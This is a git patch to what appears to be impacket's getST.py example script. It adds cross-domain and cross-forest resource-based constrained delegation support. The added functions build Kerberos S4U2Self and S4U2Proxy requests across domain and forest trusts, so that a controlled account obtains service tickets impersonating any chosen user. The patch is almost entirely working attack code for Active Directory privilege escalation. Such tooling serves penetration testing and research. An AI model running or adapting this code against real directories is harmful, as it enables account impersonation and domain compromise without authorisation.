From 8da58891b0c08b26916652e1a2fe643bd85cda32 Mon Sep 17 00:00:00 2001
From: Simon Msika <simon.msika@synacktiv.com>
Date: Tue, 17 Mar 2026 14:01:23 +0100
Subject: [PATCH] Added cross forest & cross domain RBCD support

---
 examples/getST.py | 506 ++++++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 489 insertions(+), 17 deletions(-)

diff --git a/examples/getST.py b/examples/getST.py
index 377a0f5b1a..5c79aa4569 100755
--- a/examples/getST.py
+++ b/examples/getST.py
@@ -90,11 +90,14 @@ def __init__(self, target, password, domain, options):
         self.__aesKey = options.aesKey
         self.__options = options
         self.__kdcHost = options.dc_ip
+        self.__otherdcHost = options.targetdc
+        self.__targetDomain = options.targetdomain
         self.__force_forwardable = options.force_forwardable
         self.__additional_ticket = options.additional_ticket
         self.__dmsa = options.dmsa
         self.__saveFileName = None
         self.__no_s4u2proxy = options.no_s4u2proxy
+        self.__forest = options.forest
         if options.hashes is not None:
             self.__lmhash, self.__nthash = options.hashes.split(':')
 
@@ -172,6 +175,454 @@ def saveTicket(self, ticket, sessionKey):
         logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
         ccache.saveFile(self.__saveFileName + '.ccache')
 
+
+
+    def doS4U2SelfCrossDomain(self, ticket, decodedTGT, cipher, sessionKey, kdcHost, targetDomain, crossforest):
+        # We have a TGT valid for the cross-domain interaction 
+
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] =  constants.encodeFlags(opts)
+        seq_set(apReq,'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+
+        clientName = Principal()
+        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] =  now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+
+        # Key Usage 7
+        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+        # TGS authenticator subkey), encrypted with the TGS session
+        # key (Section 5.5.1)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+
+        tgsReq['pvno'] =  5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        opts.append( constants.KDCOptions.forwardable.value )
+        opts.append( constants.KDCOptions.renewable.value )
+        opts.append( constants.KDCOptions.renewable_ok.value )
+        opts.append( constants.KDCOptions.canonicalize.value )
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        logging.debug("Principal : " + "%s@%s@%s " % (self.__user, targetDomain, decodedTGT['crealm']))
+        logging.debug("Domain : " + self.__domain)
+        if crossforest:
+            serverName = Principal("%s@%s" % (self.__user, decodedTGT['crealm']), self.__domain, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+        else:
+            serverName = Principal("%s@%s@%s" % (self.__user, self.__domain, targetDomain), self.__targetDomain, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = targetDomain
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
+                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                            int(cipher.enctype)
+                        )
+                    )
+
+        S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_ENTERPRISE.value)
+        if crossforest:
+            S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__domain) + b'Kerberos'
+        else:
+            S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__targetDomain) + b'Kerberos'
+
+        logging.debug(S4UByteArray)
+
+        paencoded = None
+        padatatype = None
+
+        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
+        # with the following three parameters: the session key of the TGT of
+        # the service performing the S4U2Self request, the message type value
+        # of 17, and the byte array S4UByteArray.
+        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
+
+        paForUserEnc = PA_FOR_USER_ENC()
+        crossDomainClient = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+        seq_set(paForUserEnc, 'userName', crossDomainClient.components_to_asn1)
+        if crossforest:
+            paForUserEnc['userRealm'] = self.__domain
+        else:
+            paForUserEnc['userRealm'] = self.__targetDomain
+        paForUserEnc['cksum'] = noValue
+        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
+        paForUserEnc['cksum']['checksum'] = checkSum
+        paForUserEnc['auth-package'] = 'Kerberos'
+
+        encodedPaForUserEnc = encoder.encode(paForUserEnc)
+        padatatype = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
+        paencoded = encodedPaForUserEnc
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = padatatype
+        tgsReq['padata'][1]['padata-value'] = paencoded
+
+        message = encoder.encode(tgsReq)
+
+        r = sendReceive(message, targetDomain, kdcHost)
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        cipherText = tgs['enc-part']['cipher']
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
+
+        return r, sessionKey, newSessionKey
+    
+
+    def doS4UProxyCrossDomain(self, ticket, decodedTGT, additionalTicket, cipher, sessionKey, kdcHost, targetDomain, crossForest):
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] =  constants.encodeFlags(opts)
+        seq_set(apReq,'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+
+        clientName = Principal()
+        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] =  now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+        tgsReq['pvno'] =  5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # Add resource-based constrained delegation support
+        paPacOptions = PA_PAC_OPTIONS()
+        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
+        if crossForest:
+            paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,constants.PAPacOptions.branch_aware.value))
+
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+        
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        if not(crossForest):
+            seq_set_iter(reqBody, 'additional-tickets', (additionalTicket,))
+
+        opts = list()
+        # This specified we're doing S4U
+        if not(crossForest):
+            opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = str(targetDomain)
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
+                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                            int(cipher.enctype)
+                        )
+                    )
+        message = encoder.encode(tgsReq)
+
+        logging.info('Requesting S4U2Proxy')
+        r = sendReceive(message, targetDomain, kdcHost)
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        cipherText = tgs['enc-part']['cipher']
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
+
+
+        return r, sessionKey, newSessionKey
+    
+    
+    def doRBCDCrossForest(self, ticket, decodedTGT, additionalTicket, cipher, sessionKey, kdcHost, targetDomain):
+        apReq = AP_REQ()
+        new_cipher = crypto._RC4
+
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] =  constants.encodeFlags(opts)
+        seq_set(apReq,'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+
+        clientName = Principal()
+        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] =  now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+        encryptedEncodedAuthenticator = new_cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = new_cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+        tgsReq['pvno'] =  5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # Add resource-based constrained delegation support
+        paPacOptions = PA_PAC_OPTIONS()
+        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+        opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = str(targetDomain)
+
+        seq_set_iter(reqBody, 'additional-tickets', (additionalTicket,))
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
+                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                            int(new_cipher.enctype)
+                        )
+                    )
+        message = encoder.encode(tgsReq)
+
+        logging.info('Requesting TGS')
+        r = sendReceive(message, targetDomain, kdcHost)
+
+        return r
+
+    def doS4UCrossForest(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, otherDcHost, otherDomain):
+        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        # Extract the ticket from the TGT
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        logging.debug("Trying step S4U2SELF for domain:" + self.__domain.upper())
+
+        targetDomain = self.__domain.upper()
+        r, TGT_sessionKey, newSessionKey = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, kdcHost, targetDomain, True)
+
+        logging.debug("S4U2Self - OK")
+
+        domain = self.__domain.upper()
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+        
+        sessionKey = TGT_sessionKey
+        
+        # We use the cross-domain TGT in the authenticator
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+       # But we include our S4U2SELF service ticket as an additional ticket
+        add_ticket = Ticket()
+        add_ticket.from_asn1(tgs['ticket'])
+        myTicket = add_ticket.to_asn1(TicketAsn1())
+
+        r, _, _ = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, cipher, sessionKey, kdcHost, domain, False)
+
+        logging.debug("Second step S4U2Proxy - OK")
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        lastticket = Ticket()
+        lastticket.from_asn1(tgs['ticket'])
+        last = lastticket.to_asn1(TicketAsn1())
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+
+        r, _, newSessionKeyTGS = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, cipher, sessionKey, kdcHost, domain, True)
+        logging.debug("Third step OK : S4U2Proxy crossforest")
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        # Extract the ticket from the TGS
+        ticket = Ticket()
+        ticket.from_asn1(tgs['ticket'])
+        logging.debug("Fourth step TGS crossforest - OK")
+
+        r = self.doRBCDCrossForest(ticket, decodedTGT, last, cipher, newSessionKeyTGS, otherDcHost, otherDomain)
+
+        return r, None, newSessionKeyTGS, None
+    
+
+    def doS4UCrossDomain(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, otherDcHost):
+        init_cipher = cipher
+        init_session_key = sessionKey
+        logging.debug("Asking for cross-domain TGT")
+        target = ("krbtgt/%s@%s" % (self.__targetDomain, self.__domain))
+        serverName = Principal(target, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        cross_domtgt, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, kdcHost, tgt, cipher, sessionKey, self.__options.renew)
+        crossdom_cipher = cipher
+        logging.debug("Cross-domain TGT - OK")
+
+        try: 
+            decodedTGT = decoder.decode(cross_domtgt, asn1Spec=AS_REP())[0]
+        except:
+            decodedTGT = decoder.decode(cross_domtgt, asn1Spec = TGS_REP())[0]
+
+        # Extract the ticket from the cross-domain TGT
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        targetDomain = self.__targetDomain.upper()
+        r, TGT_sessionKey, newSessionKey = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, otherDcHost, targetDomain, False)
+
+        logging.debug("Referral S4U2Self - OK")
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        sessionKey = newSessionKey
+        
+        # Extract the ticket from the response
+        ticket = Ticket()
+        ticket.from_asn1(tgs['ticket'])
+        
+        # We do not need to store the sessionKey, as we will only use the initial TGT and the cross-domain TGT in the authenticator 
+        r, _, _ = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, kdcHost, str(decodedTGT['crealm']).upper(), False)
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        logging.debug("S4U2Self - OK")
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+            
+                                                                        
+        ### Now we have the second ticket : S4U2Self effective ticket
+        # We still have to perform the S4U2Proxy 
+        sessionKey = TGT_sessionKey
+        
+        # We use the initial TGT in the authenticator
+       # But we include our S4U2SELF service ticket  as an additional ticket
+        add_ticket = Ticket()
+        add_ticket.from_asn1(tgs['ticket'])
+        myTicket = add_ticket.to_asn1(TicketAsn1())
+
+        initial_tgt = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        ticket = Ticket()
+        ticket.from_asn1(initial_tgt['ticket'])
+
+        r, _, _ = self.doS4UProxyCrossDomain(ticket, initial_tgt, myTicket, init_cipher, init_session_key, kdcHost, str(decodedTGT['crealm']).upper(), False)
+
+        logging.debug("Referral S4U2Proxy - OK")
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+        add_ticket = Ticket()
+        add_ticket.from_asn1(tgs['ticket'])
+
+        myTicket = add_ticket.to_asn1(TicketAsn1())
+        
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        r, oldsess , newsess = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, crossdom_cipher, sessionKey, otherDcHost, self.__targetDomain, False)
+        logging.debug("S4U2Proxy - OK")
+
+        return r, None, oldsess, None
+    
     def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
         if not os.path.isfile(additional_ticket_path):
             logging.error("Ticket %s doesn't exist" % additional_ticket_path)
@@ -788,8 +1239,11 @@ def run(self):
         if TGT is not None:
             tgt, cipher, sessionKey = TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']
             oldSessionKey = sessionKey
+            logging.debug("session key : " + str(sessionKey.contents))
             
         if tgt is None:
+            # If otherDCHost is not None, and cross-forest is false, we need to obtain a ST for krbtgt on the second domain
+             
             # Still no TGT
             userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
             logging.info('Getting TGT for user')
@@ -799,6 +1253,9 @@ def run(self):
                                                                     self.__kdcHost)
             logging.debug("TGT session key: %s" % hexlify(sessionKey.contents).decode())
 
+            
+
+
         # Ok, we have valid TGT, let's try to get a service ticket
         if self.__options.impersonate is None:
 
@@ -814,23 +1271,34 @@ def run(self):
             self.__saveFileName = self.__user
         else:
             # Here's the rock'n'roll
-            try:
-                logging.info('Impersonating %s' % self.__options.impersonate)
-                # Editing below to pass hashes for decryption
-                if self.__additional_ticket is not None:
-                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
-                                                                                                  self.__kdcHost, self.__additional_ticket)
-                else:
-                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
-            except Exception as e:
-                logging.debug("Exception", exc_info=True)
-                logging.error(str(e))
-                if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
-                    logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
-                if str(e).find('KDC_ERR_BADOPTION') >= 0:
-                    logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
-
-                return
+            
+            # Cross domain/forest interactions
+            if (self.__otherdcHost is not None) and (self.__targetDomain is not None):
+                try:
+                    if self.__forest:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4UCrossForest(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, self.__otherdcHost, self.__targetDomain)
+                    else:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4UCrossDomain(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, self.__otherdcHost)
+                except Exception as e:
+                    print(str(e))
+            else: 
+                try:
+                    logging.info('Impersonating %s' % self.__options.impersonate)
+                    # Editing below to pass hashes for decryption
+                    if self.__additional_ticket is not None:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
+                                                                                                    self.__kdcHost, self.__additional_ticket)
+                    else:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
+                except Exception as e:
+                    logging.debug("Exception", exc_info=True)
+                    logging.error(str(e))
+                    if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
+                        logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
+                    if str(e).find('KDC_ERR_BADOPTION') >= 0:
+                        logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
+
+                    return
             self.__saveFileName = self.__options.impersonate
 
         self.saveTicket(tgs, oldSessionKey)
@@ -872,6 +1340,10 @@ def run(self):
                                                                           '(128 or 256 bits)')
     group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
                                                                             'omitted it use the domain part (FQDN) specified in the target parameter')
+    group.add_argument('-targetdc', action='store', metavar="ip address", help='IP Address of the second domain controller to use. Necessary '
+                                                                            'for cross-domain/forest RBCD')
+    group.add_argument('-targetdomain', action='store', metavar="ip address", help='Second domain to target. Necessary for cross-domain/forest RBCD')
+    parser.add_argument('-forest', dest='forest', action='store_true', help='For cross-forest RBCD')
 
     if len(sys.argv) == 1:
         parser.print_help()